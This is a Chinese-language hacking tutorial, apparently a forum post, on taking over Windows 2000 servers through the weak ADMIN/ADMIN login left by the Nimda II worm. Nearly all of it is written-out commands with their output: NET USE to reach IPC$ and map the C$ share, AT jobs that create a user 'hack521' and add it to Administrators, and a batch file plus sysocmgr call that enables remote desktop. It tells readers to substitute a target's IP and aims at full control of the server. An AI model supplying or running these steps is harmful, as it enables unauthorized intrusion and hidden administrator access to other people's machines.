在WINDOWS 2000的网络命令家族中,NET命令集和AT远程执行工具是最好的工具!
目前,尼姆达II病毒仍然在互联网络上广为流传!
我们就利用尼姆达II给我们带来的漏洞!
结合NET命令集和AT远程执行工具把自己提升为系统管理员吧!
首先,需要你的电脑上安装有Windows 2000 Server OR Professional
其次,我们进入CMD(Windows 2000的命令提示符)
(不知道如何进入命令提示符?)
单击开始按钮,选择运行……,输入CMD,然后回车
会看到一个窗口(DOS状态的)
C:\NET USE \\127.0.0.1\IPC$ "ADMIN" /USER:"ADMIN"
命令成功完成
C:\NET USE X: \\127.0.0.1\C$
命令成功完成
C:\NET TIME \\127.0.0.1 /SET
是否与\\127.0.0.1的时间一致?[Y/N]Y
命令成功完成
C:\AT \\127.0.0.1 18:00 C:\WINNT\SYSTEM32\NET.EXE USER hack521 123 /ADD
计划成功添加 ID=1
C:\AT \\127.0.0.1 18:02 C:\WINNT\SYSTEM32\NET.EXE LOCALGROUP Administrators hack521 /ADD
计划成功添加 ID=2
OK 我来解释一下!
127.0.0.1是你本地的IP地址(没有上网的时候),具体实战的时候替换成对方的网络IP!
"ADMIN" /USER:"ADMIN" 这个是尼姆达II病毒制造的弱口令!权限为SYSTEM!
NET TIME \\127.0.0.1 /SET 将本地时间与服务器时间同步!
两行AT命令是分别在18:00与18:02执行服务器的两个NET命令
前一个是创建一个用户,后面的是将用户提升为系统管理员
这样,我们以后就可以用hack521这个用户访问这台服务器了!
黑客的目的不仅仅是要提升自己为系统管理员而已,还要完全控制整台服务器!
我们仍然在命令提示符下面(CMD状态)
C:\COPY CON hack.bat
@ECHO TSEnable = on C:\sql^Z
1 个文件拷贝完成
C:\COPY hack.bat X:1 个文件拷贝完成
C:\AT \\127.0.0.1 18:30 C:\hack.bat
计划成功添加 ID=1
C:\AT \\127.0.0.1 18:32 C:\WINNT\SYSTEM32\sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
计划成功添加 ID=1
c:OK 我来解释一下!
COPY CON hack.bat是创建一个批处理,输入命令的时候一定要小心,错了就得重新来一遍!
(如果notepad使用熟练的话,可以使用notepad编辑)
X:是映射的本地驱动器,盘符是自己定义的(不与本地驱动器同名即可)
两行AT命令是分别在18:30与18:32执行服务器的两个外部程序
前一个是执行我们创建的那个批处理程序,后面的是调用系统服务管理,启动远程管理功能
执行后,你不要着急连接远程管理功能,因为服务器正在重新启动中,得等一段时间!
大约5-6分钟以后,就可以使用了!
使用WinCtrl软件(关于WinCtrl的使用方法,看软件的帮助)连接上服务器!
当看到登录屏幕的时候,使用刚才创建的hack521用户登录吧!
